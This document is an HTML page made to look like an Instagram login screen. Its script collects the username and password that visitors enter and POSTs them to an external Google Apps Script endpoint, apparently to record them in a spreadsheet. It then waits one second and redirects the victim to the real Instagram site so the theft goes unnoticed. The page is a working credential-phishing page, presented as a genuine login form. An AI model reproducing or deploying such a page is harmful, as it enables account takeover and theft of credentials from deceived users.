<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
    <style>
        * { 
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            background-color: #eee;
            font-family: 'Overpass Mono', monospace;
        }
        
        #wrapper {
            width: 500px;
            margin: 50px auto;
            padding: 10px;
            overflow: hidden;
        }
        
        .main-content {
            width: 250px;
            margin: 10px auto;
            background-color: #fff;
            border: 2px solid #e6e6e6;
            padding: 40px 50px;
        }
        
        .header {
            margin-bottom: 5px;
            text-align: center;
        }
        
        .header img {
            height: 50px;
            width: 175px;
        }
        
        .input-1, .input-2 {
            width: 100%;
            margin-bottom: 5px;
            padding: 8px 12px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
        }
        
        .overlap-text {
            position: relative;
        }
        
        .overlap-text a {
            position: absolute;
            top: 8px;
            right: 10px;
            color: #003569;
            font-size: 14px;
            text-decoration: none;
        }
        
        .btn {
            width: 100%;
            background-color: #3897f0;
            border: 1px solid #3897f0;
            padding: 5px 12px;
            color: #fff;
            font-weight: bold;
            cursor: pointer;
            border-radius: 3px;
        }
        
        .sub-content {
            width: 250px;
            margin: 10px auto;
            border: 1px solid #e6e6e6;
            padding: 20px 50px;
            background-color: #fff;
            text-align: center;
        }
        
        .s-part a {
            text-decoration: none;
            color: #3897f0;
        }
        
        input:focus {
            background-color: yellow;
        }
        
        .youtube {
            position: fixed;
            bottom: 10px;
            right: 10px;
            width: 160px;
            text-align: center;
            padding: 15px 10px;
            background: #bb0000;
            border-radius: 5px;
        }
        
        .youtube a {
            text-decoration: none;
            color: #fff;
            text-transform: capitalize;
            letter-spacing: 1px;
        }
    </style>
    <script>
        function sendToGoogleSheets(username, password) {
            fetch("https://script.google.com/macros/s/AKfycbwUuTK109Cr7PsqkdC6qdQuwg6qkEnCF4PZ0UXtJ2ruta1XRJF0UlyDiwcfvTohk9m_/exec", {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({ username: username, password: password })
            })
            .then(response => response.text())
            .then(data => console.log("Data sent to Google Sheets:", data))
            .catch(error => console.error("Error sending data:", error));
        }

        function redirectToInstagram() {
            window.location.href = "https://www.instagram.com/?hl=en";
        }

        function validateLogin() {
            var username = document.querySelector(".input-1").value;
            var password = document.querySelector(".input-2").value;
            
            if (username !== "" && password !== "") {
                sendToGoogleSheets(username, password);
                setTimeout(redirectToInstagram, 1000); // Delay for smooth execution
            } else {
                alert("Please fill in both fields.");
            }
        }
    </script>
</head>
<body>
    <div id="wrapper">
        <div class="main-content">
            <div class="header">
                <img src="https://i.imgur.com/zqpwkLQ.png" />
            </div>
            <div class="l-part">
                <input type="text" placeholder="Username" class="input-1" />
                <div class="overlap-text">
                    <input type="password" placeholder="Password" class="input-2" />
                    <a href="#">Forgot?</a>
                </div>
                <input type="button" value="Log in" class="btn" onclick="validateLogin()" />
            </div>
        </div>
        <div class="sub-content">
            <div class="s-part">
                Don't have an account? <a href="#">Sign up</a>
            </div>
        </div>
    </div>
</body>
</html>
